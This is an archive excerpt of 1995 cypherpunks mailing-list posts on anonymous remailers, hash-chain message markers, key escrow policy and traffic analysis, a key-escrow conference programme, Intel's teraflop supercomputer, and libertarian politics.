   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFCbU6DthkLkvrK9AQExWwQAoXSQ+6rL2tLf61F1Zj7fX6gO4ZZOaASZ
O5v0aDN1LXttmv+YUslMU8B1mpKexVk5FZDBMJ2MkonDssi5kcNNhUKc911x7zyh
oLh1I8lA4RPKdrxY7AuRF+GQpOmHFpb6FK18Aq+EkiJX5mmKpCANY8tYqcpiZ4o7
GHt0DVuKhaE=
=uQD0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 15:39:46 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Slightly faster checking for encrypted messages to me
Message-ID: <199509082239.PAA20047@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 9/5/95 -0800, Doug Barnes wrote to Hal and us:

>If two entities want to communicate via a message pool,
>without worrying about traffic analysis, but don't want
>the overhead of trying to decrypt every headerless
>message to the pool, then they can do the following:
>
>1) In a "headered" message, one of the entities (A) sends
>   a collection of large random numbers to be used as return
>   markers, encrypted with the public key of the desired
>   correspondent (B).
>
>2) B can then respond to A with an essentially headerless
>   message prefixed with one of the numbers send by A.
>   This initial message should contain a list of similar
>   numbers for B, that A can use to send messages to B.

There's a way to get this without sending as much data -
using a relative of S/Key (probably not affected by S/Key patent.)
A sends B two random numbers, thing1 and thing2.
B's headers include a prefix of
        n, hash( thing2, hash^n(thing1) )
where hash^n is n rounds of hash, e.g. MD4 or MD5.
Thing2 can possibly be a well-known string instead.  
Assuming there's no special relationship between thing2 and 
the hash function, it should be hard to derive 
        hash( thing2, hash^n(thing1) ) 
from 
        hash( thing2, hash^(n-1)(thing1) )
presumably as hard as inverting the hash.  
(Brute-force is an option if thing1 is not chosen well, 
involving a few hundred hashes on a few million popular wimpy passwords,
but S/Key suffers from the same weakness.)

Including n in the header is a mild message-correlation risk, 
though messages don't have to be sent with consecutive n's 
(at a cost of more runs of hash per message.)  This lets you recover
easily from lost messages.  There's also the mild risk that the
thing1 and thing2 keys need to be stored, though Doug's method
also suffers from that.

It is also possible to use S/Key itself - the original message
from B to A contains Xn = hash^n(key) and maybe n.  
The next message contains Xn-1 = hash^(n-1)(key), which A checks by 
hashing it and looking in his table of messageids for Xn.
A can recover from small numbers of lost messages by hashing a few times.
(Since you're not using it for authentication, is it covered by
the S/Key patent?)

This method has the weakness that Traffic Analysts can also
correlate messages by hashing the fields and comparing with previous.
One workaround is to for B to also send A the keys for some simple
encryption method E such as "Ek = m xor k" and use Xn = Ek(hash^n(key)).
This requires A to perform an xor and a hash for each correspondent
(B, C, D, ...), but is probably secure enough.  Alternatively,
since the numbers are fairly short, you can use "Ek = m^k mod p",
but that's starting to look like work :-).



#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 15:40:14 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
Message-ID: <199509082239.PAA20081@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 PM 9/6/95 -0700, you wrote:
>Our local University apparently has been logging ALL mail to anon.penet,
>including faculty, students, and off-campus users.

Any time you're using non-encrypted remailers, you've got no protection
against people doing that; even with encrypted messages they can still
tell who's sending mail to anon.penet.fi, but can't tell who the messages
are forwarded to.

There may be ECPA issues involved, especially if CalPolySLO is a government-
run university; the sysadmins certainly need to learn some ethics...
If your ombudsperson can be reached by email, a note through anon.penet.fi
explaining the usefulness of anonymous remailers for sensitive communications
might be educational.  After all, it's a technique they might want to use
for handling sexual harassment cases or other problems requiring two-way
communications.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Fri, 8 Sep 95 12:45:46 PDT
To: cypherpunks@toad.com
Subject: Re: Car rentals, Driver's Licenses, Ecash, & Net Access
Message-ID: <v02120d00ac76137192e3@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 PM 9/8/95, Duncan Frissell wrote a very interesting disquisition:

 <snip>
>An attempted cartel of that sort --- one that tries to enlist the billion or
>so people who will be easily and reliably switching funds within a few years
>--- is doomed to failure.  Too many potential 'cheaters.'  Too much money to
>be made by breaking with the cartel and offering financial services to
>others who wish to use them.
 <snip>

        One question: Most of your remarks (and you're in no way alone in
this regard) seem to assume that uniformity is a sine qua non of law
enforcement (as opposed, say, to selective enforcement. Correct me if I'm
wrong.
        I wonder, though, whether this is so; isn't it true that the
impossibility of consistent enforcement may well encourage a systemically
selective enforcement (maybe shaped by this or that, one's politics, for
example)? Presumably, then, law enforcement would take on an increasingly
"terroristic" character--"random," as IRS audits and the like can be.
        Some recent high-profile cases (Packwood, and Kenneth Starr's
efforts to indict Gov. Tucker) might indicate the shape that enforcement
could take, especially in light of some recent congressional legislative
efforts: the gov't investigates you regarding X, in the process of the
investigation turns up Y and Z, and thus finds reason maybe to look into A,
B, and C as well--in effect, turning your life into a nightmare.
        But I digress: The main point, really, is that enforcement doesn't
need to be nonselective to be "effective." I think this holds whether I
understood your remarks correctly or not.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kqb@whscad1.att.com (Kevin Q Brown +1 201 386 7344)
Date: Fri, 8 Sep 95 15:47:10 PDT
To: cypherpunks@toad.com
Subject: GAK Hacks and Position Surveillance
Message-ID: <9509082244.AA12403@ig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> GAK Hacks!
> We did it for SSL, let's do it for GAK.
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

Tim,
That's a start.  Superencryption can protect the _content_ of the
conversation, but it will not prevent _traffic analysis_.  That is
an important issue because, as I explain below, in our increasingly
wired world, effective traffic analysis may become a _position_
escrow system, except that there won't even be any escrow.

A GAK Hack that combines superencryption with a method to defeat traffic
analysis would raise a lot more eyebrows than superencryption alone.
Unfortunately, since we don't yet know what kind of LEAFs will be in
the next-generation GAK proposal, I can only refer to some comments
made awhile ago about Clipper-based traffic analysis:

  Date: Mon, 14 Mar 94 10:36:05 EST
  From: smb@research.att.com
  > The LEAF can be decrypted with just the family key; from what's been
  > disclosed so far, local law enforcement agents will be able to do that
  > without contacting the escrow sites.  The LEAF contains the unit id of
  > the chip, independent of what phone number it's being used from, ...

Imagine someone using a GAK/LEAF communication device while travelling
throughout the day.  Especially if the communications are wireless,
no court order will be needed to track position during his/her journeys
because a packet sniffer armed with the family key could detect any
of his/her communications automatically.  You may wonder "what packet
sniffer could track communications like that"?  Maybe I'm wrong, but
isn't that what the recent Digital Telephony legislation was for?

Now let's return to a recent message from tcmay@got.net:
> The pernicious nature of the "escrow" idea, ... is that it says that
> surveillance is not so bad after all, because the results of the escrow
> will not be looked at except when "justified." ...

Or perhaps, once a GAK system with some kind of LEAFs is in place,
no justification at all will be needed to accomplish efficient and
fully automated massive position surveillance.  Maybe key escrow is
just a red herring to distract us from position surveillance?
Of course, we can assume that these LEAFs will not be as vulnerable
to forging as Matt Blaze demonstrated for Clipper (Tessera?).

First we had:
  GAK = Government Access to Keys.
Perhaps now we have:
  GULPS = Government Unlimited License for Position Surveillance?

Frankly, I wouldn't be surprised if I have overstated the threat
and more technically knowledgeable minds on this list will expose
the flaws in my reasoning.  Please do.

                              Kevin Q. Brown
                              kevin.q.brown@att.com
                              kqb@whscad1.wh.att.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 8 Sep 95 16:34:28 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC   [NOISE]
Message-ID: <199509082334.QAA16208@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>Is there something authoritarians want, that we don't mind them having,
>for which crypto would be an enabling technology?  Some of them _might_
>be interested in having better encryption for TV channels so that kids
>can't watch a NotForKids channel (though many of them might rather ban
>it outright) or so they can easily control whether their kids get to
>watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit.
>Perhaps they'd enjoy having reputation systems available, so they can
>easily filter out politically incorrect material, or do a thumbs-down
>on things they disapprove of, or let the Baptists and Catholics and
>Anti-Baptists all have their own convenient ratings.

MTV has a pretty funny parody of the V-chip concept that they have run on
occasion.  They are advertising that kids should get the MTV-chip which
prevents parents from watching MTV while the kids are at school.  Their
slogan is "keep mind control at home where it belongs".

(I find it interesting that they have an anti-censorship stance, yet censor
many of their videos.  Kind of hypocritical...)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Fri, 8 Sep 95 14:35:20 PDT
To: cypherpunks@toad.com
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <9509082134.AA19037@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Jim Ray:
> "Josh M. Osborne" <stripes@va.pubnix.com> writes:
> 
> >down somewhat, in a very libertarian society oyu might be able to
> >run a profatable ISP selling to the very nich market of people who
> >want to threten, harass, or generally make a nuicence of themselves).
> 
> As the list's designated "very libertarian" advocate, I must object.
> Here is what you must sign to become a member of the Libertarian Party:

	And here, I must object (sorry Perry; I'll be brief).

	Whatever do the workings of an hypothetical "libertarian"
society have to do with the "Libertarian Party"?  Certainly, it would
be nice if the latter were working towards the former, but the two are
not the same.

	I know of quite a few `l'ibertarians who strongly object to
the `L'ibertarian Party pledge.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 07:35:28 PDT
To: cypherpunks@toad.com
Subject: Cryptography Global Challenges
Message-ID: <199509081435.QAA06954@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



International Cryptography Institute 1995


Global Challenges


Thursday-Friday September 21-22, 1995


Presented by
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., N.W.
Washington, D.C. 20006
202-842-4800
Fax: (202) 296-4098


President James P. Chandler Emeritus Professor of Law

_______________________________________________________


The International Cryptography Institute will address the
cryptography challenges associated with meeting the
information protection needs of users and the law
enforcement and national security needs of nations.
Topics to be covered include national and international
cryptography policies and regulations, international
requirements and approaches, commercial cryptography,
privacy and trust, key escrow encryption, busines
requirements, law enforcement requirements, and the use
of cryptography with electronic payments.

_______________________________________________________

Keynote Speaker

FBI Director Louis J. Freeh

_______________________________________________________


Program


September 21, 1995


8:30-9:00     Welcome and Opening Remarks

              James Chandler, President, National
              Intellectual Property Law Institute

              Dorothy E. Denning, Chair of Program

              David Kahn, Visiting Historian, National
              Security Agency, U. S.


9:00-9:40     Cryptography in Business

              M. Blake Greenlee, U.S.


9:40-10:20    Commercial Use of Cryptography

              Nick Mansfield, Shell International, The
              Netherlands


10:20-10:50   Break


10:50-11:20   Computer Industry Position on Privacy and
              Trust in an Information Society

              Yves Le Roux, Digital Equipment
              Corporation, France


11:20-12:00   The International Cryptography Experiment
              and Worldwide Cryptographic Products
              Survey

              David Balenson, Trusted Information
              Systems, Inc., U.S.


12:00-12:30   Export Controls on Encryption Software

              Ira Rubenstein, Microsoft Corp., U.S.


12:30-2:00    Lunch with Keynote

              Louis J. Freeh, Director, Federal Bureau
              of Investigation


2:00-3:00     Cryptography and the Information Society:
              Recent Developments in the European Union

              David J. Gould, Cabinet Office, UK


3:00-3:30     Encryption Policy and Technology in Japan

              Mitsuru Iwamura, The Bank of Japan, Japan


3:30-3:50     Break


3:50-4:30     Towards an Australian Policy on Encryption

              Peter Ford, Attomey General's Department,
              Australia


4:30-5:00     New National Encryption Policies and
              Regulations in Russia

              Anatoly Ledbeder, LAN Crypto Ltd., Russia


5:00-6:00     International Regulation of Cryptography:
              An Update

              James Chandler, National Intellectual
              Property Law Institute, US.


5:30-6:30     Reception

_______________________________________________________


September 22


8:30-9:20     U.S. Government Cryptography Policy

              Michael R. Nelson, Office of Science and
              Technology Policy, US.

              Ronald D. Lee, National Security Agency,
              US.


9:20-10:10    Law Enforcement Requirements for
              Encryption

              William E. Baugh, Jr., Edward L. Allen,
              Michael D. Gilmore, Federal Bureau of
              Investigation, US.


10:10-10:40   Break


10:40-11:20   Intemational Key Escrow Encryption

              Dorothy E. Denning, Georgetown University,
              US.


11:20-12:00   Transnational Key Escrow
              Henry H. Perritt, Jr., Villanova
              University School of Law, US.


12:00-1:30    Lunch


1:30-3:00     Commercial and International Key Escrow

              Stewart A. Baker, Steptoe & Johnson, US.,
              moderator

              Stephen T. Walker, Trusted Information
              Systerns, Inc, US.

              Frank Sudia, Bankers Trust Company, US.

              Carmi Gressel and Itai Dror
              Fortress U & T Ltd., Israel


3:00-3:20     Break


3:20-4:00     Billing and Paying Over the Internet

              Dan Schutzer, Citibank, US.

_______________________________________________________


Faculty


Faculty Chair
Dr Dorothy Denning


Mr. Edward L. Allen
Supervisory Special Agent
Federal Bureau of Investigation


Mr. Stewart Abercrombie Baker
Partner
Steptoe & Johnson


Mr. David Balenson
Senior Computer Scientist
Trusted Information Systems, Inc.


Mr. Wllliam E. Baugh, Jr.
Assistant Director,
Information Resources Division


Dr. Ernest F. Brickell
Vice President
Bankers Trust Electronic Commerce
c/o Sandia National Labs Applied Math Dept.


Prof. James Chandler
President
National Intellectual Property Law Institute


Dr. Dorothy E. Denning
Professor
Computer Science Department
Georgetown University


Mr. Peter Ford
First Assistant Secretary, Security Division
Attorney General's Department
Australia


Mr. Louis J. Freeh, Director
Federal Bureau of Investigation


Mr. Michael D. Gilmore
Supervisory Special Agent
Federal Bureau of Investigation
Engineering Research Facility


Mr. David J. Gould
Under Secretary of State
Overseas and Defence Secretariat
Cabinet Office, London


Mr. M. Blake Greenlee
M. Blake Greenlee Associates. Ltd.


Dr. Carmi Gressel
Engineering Manager
Fortress U & T, Ltd.
Israel


Mr. David Kahn
Visiting Historian
National Security Agency,
and author, "The Codebreakers"


Dr. Anotoly Lebedev
President
LAN Crypto, Ltd.
Russia


Mr. Mitsuru Iwamura
Chief Manager
Institute for Monetary and Economic Studies
The Bank of Japan


Mr. Ronald D. Lee
General Counsel
National Security Agency


Mr. Yves Le Roux
Central Engineering, Security Program
Digital Equipment Corp.
France


Mr. Nick Mansfield
Shell International Petroleum Mattschappij B.V.
The Hague
The Netherlands


Mr. Michael R. Nelson
Special Assistant, Information Technology
White House Office of Science and Technology Policy
Old Executive Office Building. Washington DC 20506


Mr. Henry H. Perritt, Jr.
Professor of Law
Villanova University School of Law
Villanova, PA 19085


Mr. Ira Rubinstein
Senior Corporate Attorney
Microsoft Corp
Redmond, WA 98052


Dr. Dan Schutzer
Vice President
Citibank


Dr. Frank Sudia
Vice President
BT Electronics Commerce
Bankers Trust Co., New York


Mr. Stephen T. Walker
President
Trusted Information Systems, Inc.

_______________________________________________________


Location and Fees


ICI '95 will be held at the National Intellectual
Property Law Institute, 1815 Pennsylvania Ave.,
Washington, DC, third floor.


Registration is $695 before September 1 and $795
thereafter ($395/495 for U.S. Government). Payment
includes all conference materials, two lunches, and a
cocktail reception.


Cancellations Fees: All registration is subject to a $50
fee. Tuition will not be refunded if notice of
cancellation is received after September 1. 1995, but a
substitute attendee may be sent. Postmarks will not be
considered in determining timeliness of receipt.


Hotel Accommodations: A limited block of rooms has been
reserved at the Wyndam Bristol. However, registrants must
make their own hotel reservations and indicate that they
are attending the International Cryptography Institute
1995. Room reservations may be made by calling or writing
the Wyndam Bristol Hotel, 2430 Pennsylvania Ave.. N.W.
Washington, D.C. 20006 (202) 955-6000.


CLE Credit: CLE credit in mandatory states will be
applied for as requested.

_______________________________________________________


Course Registration Form

Name: 
Organization: 
Address:


Phone:


Fee:                    General            US. Gov't

Before 9/1/95           $695               $395
After 9/1/95            $795               $495


Payment (check one) Check payable to The National
Intellectual Property Law Institute


_______ Master Card           ________VISA

Card #
Expiration Date:
Signature:


Registration by Fax: 800-304-MIND  Phone:  800-301-MIND 
                     202-296 4098          202-842-48000


Mail Registration with payment to:
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., NW, Suite 300
Washington, DC 20006

_______________________________________________________












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Fri, 8 Sep 95 08:14:53 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sr58K-0002HMC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


NY Times, Sept 8, 1995.


Intel Wins Contract to Develop World's Fastest
Supercomputer

By Lawrence M. Fisher


San Francisco, Sept. 7 -- The Intel Corporation said
today that it had won a a contract from the Department of
Energy to develop what it called the world's fastest
supercomputer.


The machine, to be built at an estimated cost of $45
million, would use 9,000 of Intel's forthcoming P6
microprocessors linked in a configuration known as
massively parallel. In recent years, massively parallel
computers using thousands of relatively inexpensive
off-the-shelf chips have stolen the performance lead from
traditional supercomputers like those made famous by Cray
Research Inc., which use far fewer, but far more powerful
processors.


Intel said its new supercomputer would be the first to
achieve the goal of calculating more than a trillion
floating-point operations a second, known as a teraflop.
The machine, to be kept at Sandia National Laboratories
In Albuquerque, N.M., would be used by Department of
Energy scientists to study a variety of complex problems,
foremost among them nuclear weapons safety.


"President Clinton is committed to ending underground
nuclear testing," Victor Reis, Assistant Secretary for
Energy Programs, said in a statement. "Computer
simulation will be a principal means for insuring the
safety, reliability and effectiveness of the U.S. nuclear
deterrent. We are embarking on a 10-year program to
advance the state of high performance computing to meet
national security objectives," he said. ...


------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 Sep 95 14:35:52 PDT
To: cypherpunks@toad.com
Subject: 9K P6
Message-ID: <199509082135.RAA26681@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a bit more on Intel's supercomp virtual NW tester at:


     URL: http://www.ssd.intel.com/press/asci1.html
  

Here's a sample:

----------

Intel Scalable Systems Division

   
   Fortunately, advances in computer hardware and software 
technologies
   are making computer-based virtual weapons testing and 
prototyping a
   viable and affordable alternative to the traditional nuclear 
and
   non-nuclear testing of stockpile stewardship. The Intel 
teraflop
   computer announced today is a key milestone in the shift 
from nuclear
   testing to computer-simulated testing.

   
  The ASCI Program
  
   Located within the DOE's Defense Programs (DP) laboratories, 
the U.S.
   Department of Energy's Accelerated Strategic Computing 
Initiative
   (ASCI) is a multi-year program to extend DOE's computational 
resources
   to support virtual testing and prototyping capabilities for 
nuclear
   weapons. ...

   ASCI has four objectives, each of which requires 
computational
   capabilities that are beyond the capabilities of existing 
systems:
   
     * Performance -- Create credible virtual tests to analyze 
the
       performance and predict the behavior of nuclear weapons.
       
     * Safety -- Predict the behavior of full weapons systems 
in complex
       accident scenarios.
       
     * Reliability -- Develop the ability to make predictions 
that will
       extend the lifetime of current weapons, predict failure 
mechanisms
       and reduce routine maintenance requirements.
       
     * Renewal -- Use virtual prototyping to reduce production 
and
       testing facilities for stockpile requalification and 
replacement
       work. ...
       
   
   Beyond its weapons safety impact, the teraflop computer will 
have a
   wide range of other applications -- from developing safer, 
more
   efficient cars to simulating natural disasters in real-time 
to finding
   new drugs to fight disease. The machine will be one of the 
world's
   foremost scientific research tools and will act as a magnet 
for
   advanced research projects.

   
   In 1963, John Kennedy referred to a test ban treaty as a 
shaft of
   light cut into the darkness of the Cold War -- a chance to 
step back
   from the shadows of war. Today, by making it possible to 
ensure the
   safety, reliability, and performance of the weapons 
stockpile while
   foregoing nuclear testing, the Intel/Sandia teraflop 
computer can help
   the world take a further step back from the shadows of war 
into the
   light of peace.
   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 14:44:11 PDT
To: cman@communities.com
Subject: Re: GAK
In-Reply-To: <199509082005.NAA22461@comsec.com>
Message-ID: <9509082139.AA09726@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 7 Sep 1995 13:09:03 -0800
>From: cman@communities.com (Douglas Barnes)
>
>One good (non-cypherpunk) argument against GAK is that it
>concentrates a very large quantity of valuable keys in a few
>places, where they become an extremely attractive target for
>government or corporate espionage.

[...]


>Note that a few million keys would fit very easily on even a
>low-end DAT tape (easily hidden in a pack of cigarettes).

The same danger happens with the TIS DRC (see the company web page), even
though there is no key escrow in the TIS system.  Instead, the emergency
access field (Data Recovery Field (DRF)) is stored with the file -- but the
key which encrypts it is the public key of the Data Recovery Center (DRC).

If too much attractive stuff is available by loss of any one public key,
that key gets attacked.  To compensate for this, the TIS DRC generates new
public keys periodically to give out to new (or old) customers.

However, a government warrant which demands the DRC's private key collection
would gain quite a harvest.

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme/home.html|
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Sep 95 18:00:00 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: GAK
Message-ID: <v02120d22ac76a26200fa@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>
>If too much attractive stuff is available by loss of any one public key,
>that key gets attacked.  To compensate for this, the TIS DRC generates new
>public keys periodically to give out to new (or old) customers.
>
>However, a government warrant which demands the DRC's private key collection
>would gain quite a harvest.

The economics of the situation seem to dictate that whether you have
one key or N keys, it's going to be cheaper to subvert the escrow agent
(you guys or whoever) than it is to brute-force even one key. Therefore
I'm not clear on how using multiple keys buys you much against the most
probable threat -- opponents getting physical access to keys or the
subversion of personnel who have legitimate access.

Of course, it's still a good policy, reducing the payoff to those too
timid to try the direct approach. But I think this threat is significantly
less likely than a disgruntled employee selling the DRC private
keys on a real instantiation of the Blacknet model, without even being
solicited.

You may feel very comfortable with the personnel and procedures you
have in place now, but auditing and vetting systems are notorious
for scaling very, very poorly. You may feel you can vouch for the
trustworthiness of everyone at TIS now, but this sort of familiarity
also scales very poorly. And clearly, were this to become commercially
significant, it would need to scale quite a bit.

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard P. Klau" <KLAURICH@uofrlaw.urich.edu>
Date: Fri, 8 Sep 95 15:00:50 PDT
To: cypherpunks@toad.com
Subject: Re: Privacy book list
Message-ID: <2A82FB42074@UOFRLAW.URICH.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I got a letter in the mail today from Plenum Publishing Corp in NY,
> advertising a book called _Mind Your Own Business: The Battle for
> Personal Privacy_ by Gini Graham Scott.  It seems I am on a
> mailing list for privacy freaks.  Oh the irony!
> 
> They must have gotten my name from somewhere.  The only two sources that
> I can think of are the lists for CFP '94 and '95, and a
> revolver club that I used to be a member of.  Has anyone else on the 
> list gotten this ad? 

I got the ad (and a subsequent review copy, upon request) after we 
published the first issue of the Journal of Law & Technology on the 
web.  It appears that they got my name, and address, from the web 
(both are displayed in the "Contacting the Journal" page).

I haven't had much time to read the book, but my recollection is that 
it is somewhat misguided in its analysis of privacy online.  Its 
historical perspective is fairly thorough, however.

--Rick Klau

---------
Richard P. Klau (3L)  //  klaurich@uofrlaw.urich.edu
Editor in Chief, Richmond Journal of Law & Technology
         http://www.urich.edu/~jolt/
         




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Sep 95 17:53:26 PDT
To: cypherpunks@toad.com
Subject: Libertarian Party and Crypto Anarchy
Message-ID: <ac76325b3d021004c1d9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I've changed the name of this thread. Somehow the title "Re: [NOISE]Re:
ECPA (Was: University logging mail to anon.penet.fi)" did not quite cut it.
I really wish folks would take the effort to change thread names when
appropriate.]


At 11:24 PM 9/8/95, Jim Ray wrote:

>They were in the minority in my party, even *before* the OK City
>mass-murder proved why we have such a pledge (to distance ourselves
>from those who would initiate violence).

As a point of reference, I usually vote Libertarian, even though it's
pointless. And I'm even registered "Libertarian Party," which matters even
less. (I've also changed my registration to Democratic or Republican when I
wanted to influence in some tiny way their primaries...as when I switched
to Democrat so as to vote for Jerry Brown, mainly because of his flat tax
proposal.)

But I've never signed the LP "pledge" as I dislike such blanket pledges.
And I dislike the notion of pledges per se.

So, I'm registered to the Libertarian Party, and usually vote Libertarian.
But I am not allowed to be a dues-paying member and get their worthless
newsletters, which suits me fine.

(Anybody prepared to bomb a government building is not going to balk at
signing such a pledge, so it does little good. Personally, I think the
"pledge" is profoundly anti-libertarian, and smacks of McCarthyism.)

Your mileage may vary. And I place a lot more faith in crypto activism
having an effect than in the LP having an effect. Crypto and crypto
anarchist ideas are already creeping into the LP belief system, as
reflected in articles in "Reason" and "Liberty." And David Friedman (author
of "The Machinery of Freedom," and son of Milton) gave a talk recently in
L.A. entitled "Crypto Anarchy and the State."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Fri, 8 Sep 95 15:19:00 PDT
To: jya@pipeline.com
Subject: Re: Key Escrow Papers
In-Reply-To: <199509082016.NAA22536@comsec.com>
Message-ID: <9509082216.AA12075@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: John Young <jya@pipeline.com>
>Date: Thu, 7 Sep 1995 20:55:49 -0400

>   Note 1: It was Michael Nelson of the White House who said
>   that the reason to maintain the 64-bit limit for export was
>   because the key escrow methodology had not yet been proven
>   reliable and that the security agencies insisted on the
>   relatively weak system in case key escrow failed.

Clint Brooks of NSA repeated this assertion, at least once.  He said it
during the August 17, 1995 meeting as well.

I find this interesting, not least as a violation of security.  This
amounts to an open declaration that NSA can break through 64-bit keys.

Could it be that NSA was miffed at being upstaged in the announcement of
breaking through a 40-bit key and wanted to up the ante? .... :-)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 15:25:49 PDT
To: pfarrell@netcom.com
Subject: Re: Day 2, nist GAK meeting
In-Reply-To: <199509082025.NAA22581@comsec.com>
Message-ID: <9509082219.AA12139@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 8 Sep 1995 06:36:00 -0700
>From: pfarrell@netcom.com (Pat Farrell)

>Penny Brummitt of NSA was to talk about Clipper's key escrow agents,
>but called in sick. I didn't catch the name of the replacement.

It was Jan Manning.

He's NSA's person designing the Law Enforcement decrypt box and possibly
other related equipment for the Clipper program.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 8 Sep 95 10:23:40 PDT
To: Tom Rollins <trollins@hns.com>
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <Pine.3.89.9509081833.A4038-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Sep 1995, Tom Rollins wrote:

> I took a look at the FACTNet web page.  There is a file encrypted with
> PGP using the "-c" option.  They are asking for people to help guess
> the Pass Phrase.  Why would anyone bother if they had no clue that the
> file contained anything 'interesting'.

I can only assume one of two things - either this is a joke, as the
decrypted contents are nothing special as far as I can see (though
'interesting' in a sense), or that someone is very, very clever and
managed to hide two different messages in there with different
passphrases.

